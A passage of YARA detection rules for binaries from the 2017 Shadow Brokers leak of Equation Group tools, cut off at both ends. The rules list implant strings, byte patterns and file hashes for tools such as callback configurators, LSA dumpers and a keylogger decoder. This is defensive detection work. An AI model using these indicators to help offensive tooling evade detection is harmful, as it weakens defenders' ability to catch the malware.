    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "9c30331cb00ae8f417569e9eb2c645ebbb36511d2d1531bb8d06b83781dfe3ac"
  strings:
    $s1 = "FILE_NAME_CONVERSION.LOG" wide fullword
    $s2 = "Log file exists. You must delete it!!!" wide fullword
  condition:
    (uint16(0) == 23117 and filesize < 81920 and all of them)
}

rule EquationGroup_Toolset_Apr17_PC_Exploit {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "77486bb828dba77099785feda0ca1d4f33ad0d39b672190079c508b3feb21fb0"
  strings:
    $s1 = "\\\\.\\pipe\\pcheap_reuse" wide fullword
    $s2 = "**** FAILED TO DUPLICATE SOCKET ****" wide fullword
    $s3 = "**** UNABLE TO DUPLICATE SOCKET TYPE %u ****" wide fullword
    $s4 = "YOU CAN IGNORE ANY 'ServiceEntry returned error' messages after this..." wide fullword
  condition:
    (uint16(0) == 23117 and filesize < 20480 and 1 of them)
}

rule EquationGroup_Toolset_Apr17_PC_Level3_Gen {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "c7dd49b98f399072c2619758455e8b11c6ee4694bb46b2b423fa89f39b185a97"
    hash2 = "f6b723ef985dfc23202870f56452581a08ecbce85daf8dc7db4491adaa4f6e8f"
  strings:
    $s1 = "S-%u-%u" ascii fullword
    $s2 = "Copyright (C) Microsoft" wide fullword
    $op1 = { 24 39 65 C6 44 24 3A 6C C6 44 24 3B 65 C6 44 24 }
    $op2 = { 44 24 4E 41 88 5C 24 4F FF }
    $op3 = { 44 24 3F 6E C6 44 24 40 45 C6 44 24 41 }
  condition:
    (uint16(0) == 23117 and filesize < 409600 and 3 of them)
}

rule EquationGroup_Toolset_Apr17_put_Implant9x {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "8fcc98d63504bbacdeba0c1e8df82f7c4182febdf9b08c578d1195b72d7e3d5f"
  strings:
    $s1 = "3&3.3<3A3F3K3V3c3m3" ascii fullword
    $op1 = { C9 C2 08 00 B8 72 1C 00 68 E8 C9 FB FF FF 51 56 }
    $op2 = { 40 1B C9 23 C8 03 C8 38 5D 14 74 05 6A 03 58 EB }
  condition:
    (uint16(0) == 23117 and filesize < 20480 and 2 of them)
}

rule EquationGroup_Toolset_Apr17_promiscdetect_safe {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "6070d8199061870387bb7796fb8ccccc4d6bafed6718cbc3a02a60c6dc1af847"
  strings:
    $s1 = "running on this computer!" ascii fullword
    $s2 = "- Promiscuous (capture all packets on the network)" ascii fullword
    $s3 = "Active filter for the adapter:" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 81920 and all of them)
}

rule EquationGroup_Toolset_Apr17_PacketScan_Implant {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "9b97cac66d73a9d268a15e47f84b3968b1f7d3d6b68302775d27b99a56fbb75a"
  strings:
    $op0 = { E9 EF FE FF FF FF B5 C0 EF FF FF 8D 85 C8 EF FF }
    $op1 = { C9 C2 04 00 B8 34 26 00 68 E8 40 05 00 00 51 56 }
    $op2 = { E9 0B FF FF FF 8B 45 10 8D 4D C0 89 58 08 C6 45 }
  condition:
    (uint16(0) == 23117 and filesize < 30720 and all of them)
}

rule EquationGroup_Toolset_Apr17_SetPorts {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "722d3cf03908629bc947c4cca7ce3d6b80590a04616f9df8f05c02de2d482fb2"
  strings:
    $s1 = "USAGE: SetPorts <input file> <output file> <version> <port1> [port2] [port3] [port4] [port5]" ascii fullword
    $s2 = "Valid versions are:  1 = PC 1.2   2 = PC 1.2 (24 hour)" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 102400 and all of them)
}

rule EquationGroup_Toolset_Apr17_GrDo_FileScanner_Implant {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "8d2e43567e1360714c4271b75c21a940f6b26a789aa0fce30c6478ae4ac587e4"
  strings:
    $s1 = "system32\\winsrv.dll" wide fullword
    $s2 = "raw_open CreateFile error" ascii fullword
    $s3 = "\\dllcache\\" wide fullword
  condition:
    (uint16(0) == 23117 and filesize < 409600 and all of them)
}

rule EquationGroup_Toolset_Apr17_msgks_mskgu {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "7b4986aee8f5c4dca255431902907b36408f528f6c0f7d7fa21f079fa0a42e09"
    hash2 = "ef906b8a8ad9dca7407e0a467b32d7f7cf32814210964be2bfb5b0e6d2ca1998"
  strings:
    $op1 = { F4 65 C6 45 F5 6C C6 45 F6 33 C6 45 F7 32 C6 45 }
    $op2 = { 36 C6 45 E6 34 C6 45 E7 50 C6 45 E8 72 C6 45 E9 }
    $op3 = { C6 45 E8 65 C6 45 E9 70 C6 45 EA 74 C6 45 EB 5F }
  condition:
    (uint16(0) == 23117 and filesize < 307200 and all of them)
}

rule EquationGroup_Toolset_Apr17_Ifconfig_Target {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "1ebfc0ce7139db43ddacf4a9af2cb83a407d3d1221931d359ee40588cfd0d02b"
  strings:
    $s1 = "SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\%hs" wide fullword
    $op1 = { 0F BE 37 85 F6 0F 85 4E FF FF FF 45 85 ED 74 21 }
    $op2 = { 4C 8D 44 24 34 48 8D 57 08 41 8D 49 07 E8 A6 4B }
  condition:
    (uint16(0) == 23117 and filesize < 102400 and all of them)
}

rule EquationGroup_Toolset_Apr17_DiBa_Target {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "ffff3526ed0d550108e97284523566392af8523bbddb5f212df12ef61eaad3e6"
  strings:
    $op1 = { 41 5A 41 59 41 58 5F 5E 5D 5A 59 5B 58 48 83 C4 }
    $op2 = { F9 48 03 FA 48 33 C0 8A 01 49 03 C1 49 F7 E0 88 }
    $op3 = { 01 41 F6 E0 49 03 C1 88 01 48 33 }
  condition:
    (uint16(0) == 23117 and filesize < 2048000 and all of them)
}

rule EquationGroup_Toolset_Apr17_Dsz_Implant {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "fbe103fac45abe4e3638055a3cac5e7009166f626cf2d3049fb46f3b53c1057f"
    hash2 = "ad1dddd11b664b7c3ad6108178a8dade0a6d9795358c4a7cedbe789c62016670"
  strings:
    $s1 = "%02u:%02u:%02u.%03u-%4u: " ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 1024000 and all of them)
}

rule EquationGroup_Toolset_Apr17_GenKey {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "b6f100b21da4f7e3927b03b8b5f0c595703b769d5698c835972ca0c81699ff71"
  strings:
    $x1 = "* PrivateEncrypt -> PublicDecrypt FAILED" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 81920 and all of them)
}

rule EquationGroup_Toolset_Apr17_wmi_Implant {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "de08d6c382faaae2b4b41b448b26d82d04a8f25375c712c12013cb0fac3bc704"
  strings:
    $x1 = "SELECT ProcessId,Description,ExecutablePath FROM Win32_Process" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 51200 and all of them)
}

rule EquationGroup_Toolset_Apr17_clocksvc {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "c1bcd04b41c6b574a5c9367b777efc8b95fe6cc4e526978b7e8e09214337fac1"
  strings:
    $x1 = "~debl00l.tmp" ascii fullword
    $x2 = "\\\\.\\mailslot\\c54321" ascii fullword
    $x3 = "\\\\.\\mailslot\\c12345" ascii fullword
    $x4 = "nowMutex" ascii fullword
    $s1 = "System\\CurrentControlSet\\Services\\MSExchangeIS\\ParametersPrivate" ascii fullword
    $s2 = "000000005017C31B7C7BCF97EC86019F5026BE85FD1FB192F6F4237B78DB12E7DFFB07748BFF6432B3870681D54BEF44077487044681FB94D17ED04217145B98" ascii
    $s3 = "00000000E2C9ADBD8F470C7320D28000353813757F58860E90207F8874D2EB49851D3D3115A210DA6475CCFC111DCC05E4910E50071975F61972DCE345E89D88" ascii
  condition:
    (uint16(0) == 23117 and filesize < 204800 and (1 of ($x*) or 2 of ($s*)))
}

rule EquationGroup_Toolset_Apr17_xxxRIDEAREA {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "214b0de83b04afdd6ad05567825b69663121eda9e804daff9f2da5554ade77c6"
  strings:
    $x1 = "USAGE: %s -i InputFile -o OutputFile [-f FunctionOrdinal] [-a FunctionArgument] [-t ThreadOption]" ascii fullword
    $x2 = "The output payload \"%s\" has a size of %d-bytes." ascii fullword
    $x3 = "ERROR: fwrite(%s) failed on ucPayload" ascii fullword
    $x4 = "Load and execute implant within the existing thread" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 204800 and 1 of them)
}

rule EquationGroup_Toolset_Apr17_yak_min_install {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "f67214083d60f90ffd16b89a0ce921c98185b2032874174691b720514b1fe99e"
  strings:
    $s1 = "driver start" ascii fullword
    $s2 = "DeviceIoControl Error: %d" ascii fullword
    $s3 = "Phlook" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 307200 and all of them)
}

rule EquationGroup_Toolset_Apr17_SetOurAddr {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "04ccc060d401ddba674371e66e0288ebdbfa7df74b925c5c202109f23fb78504"
  strings:
    $s1 = "USAGE: SetOurAddr <input file> <output file> <protocol> [IP/IPX address]" ascii fullword
    $s2 = "Replaced default IP address (127.0.0.1) with Local IP Address %d.%d.%d.%d" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 102400 and 1 of them)
}

rule EquationGroup_Toolset_Apr17_GetAdmin_LSADUMP_ModifyPrivilege_Implant {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "c8b354793ad5a16744cf1d4efdc5fe48d5a0cf0657974eb7145e0088fcf609ff"
    hash2 = "5f06ec411f127f23add9f897dc165eaa68cbe8bb99da8f00a4a360f108bb8741"
  strings:
    $s1 = "\\system32\\win32k.sys" wide fullword
    $s2 = "hKeAddSystemServiceTable" ascii fullword
    $s3 = "hPsDereferencePrimaryToken" ascii fullword
    $s4 = "CcnFormSyncExFBC" wide fullword
    $s5 = "hPsDereferencePrimaryToken" ascii fullword
    $op1 = { 0C 2B CA 8A 04 11 3A 02 75 01 47 42 4E 75 F4 8B }
    $op2 = { 14 83 C1 05 80 39 85 75 0C 80 79 01 C0 75 06 80 }
    $op3 = { EB 3D 83 C0 06 33 F6 80 38 FF 75 2C 80 78 01 15 }
  condition:
    (uint16(0) == 23117 and filesize < 81920 and (4 of ($s*) or all of ($op*)))
}

rule EquationGroup_Toolset_Apr17_SendPKTrigger {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "2f9c7a857948795873a61f4d4f08e1bd0a41e3d6ffde212db389365488fa6e26"
  strings:
    $x1 = "----====**** PORT KNOCK TRIGGER BEGIN ****====----" wide fullword
  condition:
    (uint16(0) == 23117 and filesize < 307200 and all of them)
}

rule EquationGroup_Toolset_Apr17_DmGz_Target_2 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "55ac29b9a67e0324044dafaba27a7f01ca3d8e4d8e020259025195abe42aa904"
  strings:
    $s1 = "\\\\.\\%ls" ascii fullword
    $op0 = { E8 CE 34 00 00 B8 02 00 00 F0 E9 26 02 00 00 48 }
    $op1 = { 8B 4D 28 E8 02 05 00 00 89 45 34 EB 07 C7 45 34 }
    $op2 = { E8 C2 34 00 00 90 48 8D 8C 24 00 01 00 00 E8 A4 }
  condition:
    (uint16(0) == 23117 and filesize < 102400 and all of them)
}

rule EquationGroup_Toolset_Apr17_mstcp32_DXGHLP16_tdip {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "26215bc56dc31d2466d72f1f4e1b6388e62606e9949bc41c28968fcb9a9d60a6"
    hash2 = "fcfb56fa79d2383d34c471ef439314edc2239d632a880aa2de3cea430f6b5665"
    hash3 = "a5ec4d102d802ada7c5083af53fd9d3c9b5aa83be9de58dbb4fac7876faf6d29"
  strings:
    $s1 = "\\Registry\\User\\CurrentUser\\" wide fullword
    $s2 = "\\DosDevices\\%ws" wide fullword
    $s3 = "\\Device\\%ws_%ws" wide fullword
    $s4 = "sys\\mstcp32.dbg" ascii fullword
    $s5 = "%ws%03d%ws%wZ" wide fullword
    $s6 = "TCP/IP driver" wide fullword
  condition:
    (uint16(0) == 23117 and filesize < 204800 and 4 of them)
}

rule EquationGroup_Toolset_Apr17_regprobe {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "99a42440d4cf1186aad1fd09072bd1265e7c6ebbc8bcafc28340b4fe371767de"
  strings:
    $x1 = "Usage: %s targetIP protocolSequence portNo [redirectorIP] [CLSID]" ascii fullword
    $x2 = "key does not exist or pinging w2k system" ascii fullword
    $x3 = "RpcProxy=255.255.255.255:65536" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 102400 and 1 of them)
}

rule EquationGroup_Toolset_Apr17_DoubleFeatureDll_dll_2 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "f265defd87094c95c7d3ddf009d115207cd9d4007cf98629e814eda8798906af"
    hash2 = "8d62ca9e6d89f2b835d07deb5e684a576607e4fe3740f77c0570d7b16ebc2985"
    hash3 = "634a80e37e4b32706ad1ea4a2ff414473618a8c42a369880db7cc127c0eb705e"
  strings:
    $s1 = ".dllfD" ascii fullword
    $s2 = "Khsppxu" ascii fullword
    $s3 = "D$8.exe" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 1024000 and 2 of them)
}

rule EquationGroup_Toolset_Apr17_GangsterThief_Implant {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "50b269bda5fedcf5a62ee0514c4b14d48d53dd18ac3075dcc80b52d0c2783e06"
  strings:
    $s1 = "\\\\.\\%s:" wide fullword
    $s4 = "raw_open CreateFile error" ascii fullword
    $s5 = "-PATHDELETED-" ascii fullword
    $s6 = "(deleted)" wide fullword
    $s8 = "NULLFILENAME" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 307200 and 3 of them)
}

rule EquationGroup_Toolset_Apr17_SetCallbackPorts {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "16f66c2593665c2507a78f96c0c2a9583eab0bda13a639e28f550c92f9134ff0"
  strings:
    $s1 = "USAGE: %s <input file> <output file> <port1> [port2] [port3] [port4] [port5] [port6]" ascii fullword
    $s2 = "You may enter between 1 and 6 ports to change the defaults." ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 102400 and 1 of them)
}

rule EquationGroup_Toolset_Apr17_DiBa_Target_BH_2000 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "0654b4b8727488769390cd091029f08245d690dd90d1120e8feec336d1f9e788"
  strings:
    $s2 = "0M1U1Z1p1" ascii fullword
    $s14 = "SPRQWV" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 2048000 and all of them)
}

rule EquationGroup_Toolset_Apr17_rc5 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "69e2c68c6ea7be338497863c0c5ab5c77d5f522f0a84ab20fe9c75c7f81318eb"
  strings:
    $s1 = "Usage: %s [d|e] session_key ciphertext" ascii fullword
    $s2 = "where session_key and ciphertext are strings of hex" ascii fullword
    $s3 = "d = decrypt mode, e = encrypt mode" ascii fullword
    $s4 = "Bad mode, should be 'd' or 'e'" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 204800 and 2 of them)
}

rule EquationGroup_Toolset_Apr17_PC_Level_Generic {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "7a6488dd13936e505ec738dcc84b9fec57a5e46aab8aff59b8cfad8f599ea86a"
    hash2 = "0e3cfd48732d0b301925ea3ec6186b62724ec755ed40ed79e7cd6d3df511b8a0"
    hash3 = "d1d6e3903b6b92cc52031c963e2031b5956cadc29cc8b3f2c8f38be20f98a4a7"
    hash4 = "25a2549031cb97b8a3b569b1263c903c6c0247f7fff866e7ec63f0add1b4921c"
    hash5 = "591abd3d7ee214df25ac25682b673f02219da108d1384261052b5167a36a7645"
    hash6 = "6b71db2d2721ac210977a4c6c8cf7f75a8f5b80b9dbcece1bede1aec179ed213"
    hash7 = "7be4c05cecb920f1010fc13086635591ad0d5b3a3a1f2f4b4a9be466a1bd2b76"
    hash8 = "f9cbccdbdf9ffd2ebf1ee84d0ddddd24a61dbe0858ab7f0131bef6c7b9a19131"
    hash9 = "3cf7a01bdf8e73769c80b75ca269b506c33464d81f574ded8bb20caec2d4cd13"
    hash10 = "a87a871fe32c49862ed68fda99d92efd762a33ababcd9b6b2b909f2e01f59c16"
  strings:
    $s1 = "wshtcpip.WSHGetSocketInformation" ascii fullword
    $s2 = "\\\\.\\%hs" ascii fullword
    $s3 = ".?AVResultIp@Mini_Mcl_Cmd_NetConnections@@" ascii fullword
    $s4 = "Corporation. All rights reserved." wide fullword
    $s5 = { 49 83 3C 24 00 75 02 EB 5D 49 8B 34 24 0F B7 46 }
    $op1 = { 44 24 57 6F C6 44 24 58 6E C6 44 24 59 }
    $op2 = { C6 44 24 56 64 88 5C 24 57 }
    $op3 = { 44 24 6D 4C C6 44 24 6E 6F C6 44 24 6F }
  condition:
    uint16(0) == 23117 and filesize < 409600 and (2 of ($s*) or all of ($op*))
}

rule EquationGroup_Toolset_Apr17_PC_Level3_http_exe {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "3e855fbea28e012cd19b31f9d76a73a2df0eb03ba1cb5d22aafe9865150b020c"
  strings:
    $s1 = "Copyright (C) Microsoft" wide fullword
    $op1 = { 24 39 65 C6 44 24 3A 6C C6 44 24 3B 65 C6 44 24 }
    $op2 = { 44 24 4E 41 88 5C 24 4F FF }
    $op3 = { 44 24 3F 6E C6 44 24 40 45 C6 44 24 41 }
  condition:
    (uint16(0) == 23117 and filesize < 409600 and all of them)
}

rule EquationGroup_Toolset_Apr17_ParseCapture {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "c732d790088a4db148d3291a92de5a449e409704b12e00c7508d75ccd90a03f2"
  strings:
    $x1 = "* Encrypted log found.  An encryption key must be provided" ascii fullword
    $x2 = "encryptionkey = e.g., \"00 11 22 33 44 55 66 77 88 99 aa bb cc dd ee ff\"" ascii fullword
    $x3 = "Decrypting with key '%02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x'" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 51200 and 1 of them)
}

rule EquationGroup_Toolset_Apr17_ActiveDirectory_Target {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "33c1b7fdee7c70604be1e7baa9eea231164e62d5d5090ce7f807f43229fe5c36"
  strings:
    $s1 = "(&(objectCategory=person)(objectClass=user)(cn=" wide fullword
    $s2 = "(&(objectClass=user)(objectCategory=person)" wide fullword
  condition:
    (uint16(0) == 23117 and filesize < 204800 and all of them)
}

rule EquationGroup_Toolset_Apr17_PC_Legacy_dll {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "0cbc5cc2e24f25cb645fb57d6088bcfb893f9eb9f27f8851503a1b33378ff22d"
  strings:
    $op1 = { 45 F4 65 C6 45 F5 6C C6 45 F6 33 C6 45 F7 32 C6 }
    $op2 = { 49 C6 45 E1 73 C6 45 E2 57 C6 45 E3 }
    $op3 = { 34 C6 45 E7 50 C6 45 E8 72 C6 45 E9 6F C6 45 EA }
  condition:
    (uint16(0) == 23117 and filesize < 204800 and all of them)
}

rule EquationGroup_Toolset_Apr17_svctouch {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "96b6a3c4f53f9e7047aa99fd949154745e05dc2fd2eb21ef6f0f9b95234d516b"
  strings:
    $s1 = "Causes: Firewall,Machine down,DCOM disabled\\not supported,etc." ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 10240 and 1 of them)
}

rule EquationGroup_Toolset_Apr17_pwd_Implant {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "ee72ac76d82dfec51c8fbcfb5fc99a0a45849a4565177e01d8d23a358e52c542"
  strings:
    $s1 = "7\"7(7/7>7O7]7o7w7" ascii fullword
    $op1 = { 40 50 89 44 24 18 FF 15 34 20 00 }
  condition:
    (uint16(0) == 23117 and filesize < 20480 and 1 of them)
}

rule EquationGroup_Toolset_Apr17_KisuComms_Target_2000 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "94eea1bad534a1dc20620919de8046c9966be3dd353a50f25b719c3662f22135"
  strings:
    $s1 = "363<3S3c3l3q3v3{3" ascii fullword
    $s2 = "3!3%3)3-3135393@5" ascii fullword
    $op0 = { EB 03 89 46 54 47 83 FF 1A 0F 8C 40 FF FF FF 8B }
    $op1 = { 8B 46 04 85 C0 74 0F 50 E8 34 FB FF FF 83 66 04 }
    $op2 = { C6 45 FC 02 8D 8D 44 FF FF FF E8 D2 2F 00 00 EB }
  condition:
    (uint16(0) == 23117 and filesize < 204800 and (all of ($s*) or all of ($op*)))
}

rule EquationGroup_Toolset_Apr17_SlDecoder {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "b220f51ca56d9f9d7d899fa240d3328535f48184d136013fd808d8835919f9ce"
  strings:
    $x1 = "Error in conversion. SlDecoder.exe <input filename> <output filename> at command line " wide fullword
    $x2 = "KeyLogger_Data" wide fullword
  condition:
    (uint16(0) == 23117 and filesize < 204800 and 1 of them)
}

rule EquationGroup_Toolset_Apr17_Windows_Implant {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "d38ce396926e45781daecd18670316defe3caf975a3062470a87c1d181a61374"
  strings:
    $s2 = "0#0)0/050;0M0Y0h0|0" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 51200 and all of them)
}

rule EquationGroup_Toolset_Apr17_msgkd_msslu64_msgki_mssld {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "9ab667b7b5b9adf4ff1d6db6f804824a22c7cc003eb4208d5b2f12809f5e69d0"
    hash2 = "320144a7842500a5b69ec16f81a9d1d4c8172bb92301afd07fb79bc0eca81557"
    hash3 = "c10f4b9abee0fde50fe7c21b9948a2532744a53bb4c578630a81d2911f6105a3"
    hash4 = "551174b9791fc5c1c6e379dac6110d0aba7277b450c2563e34581565609bc88e"
    hash5 = "8419866c9058d738ebc1a18567fef52a3f12c47270f2e003b3e1242d86d62a46"
  strings:
    $s1 = "PQRAPAQSTUVWARASATAUAVAW" ascii fullword
    $s2 = "SQRUWVAWAVAUATASARAQAP" ascii fullword
    $s3 = "iijymqp" ascii fullword
    $s4 = "AWAVAUATASARAQI" ascii fullword
    $s5 = "WARASATAUAVM" ascii fullword
    $op1 = { 0C 80 30 02 48 83 C2 01 49 83 E9 01 75 E1 C3 CC }
    $op2 = { E8 10 66 0D 00 80 66 31 02 48 83 C2 02 49 83 E9 }
    $op3 = { 48 B8 53 A5 E1 41 D4 F1 07 00 48 33 }
  condition:
    (uint16(0) == 23117 and filesize < 1024000 and 2 of ($s*) or all of ($op*))
}

rule EquationGroup_Toolset_Apr17_DoubleFeatureDll_dll_3 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "515374423b8b132258bd91acf6f29168dcc267a3f45ecb9d1fe18ee3a253195b"
  strings:
    $a = { F4 65 C6 45 F5 6C C6 45 F6 33 C6 45 F7 32 C6 45 }
    $b = { 36 C6 45 E6 34 C6 45 E7 50 C6 45 E8 72 C6 45 E9 }
    $c = { C6 45 E8 65 C6 45 E9 70 C6 45 EA 74 C6 45 EB 5F }
  condition:
    (uint16(0) == 23117 and filesize < 1024000 and all of them)
}

rule EquationGroup_Toolset_Apr17_SetCallback {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "a8854f6b01d0e49beeb2d09e9781a6837a0d18129380c6e1b1629bc7c13fdea2"
  strings:
    $s2 = "*NOTE: This version of SetCallback does not work with PeddleCheap versions prior" ascii fullword
    $s3 = "USAGE: SetCallback <input file> <output file>" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 102400 and all of them)
}

rule EquationGroup_Toolset_Apr17__DoubleFeatureReader_DoubleFeatureReader_0 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
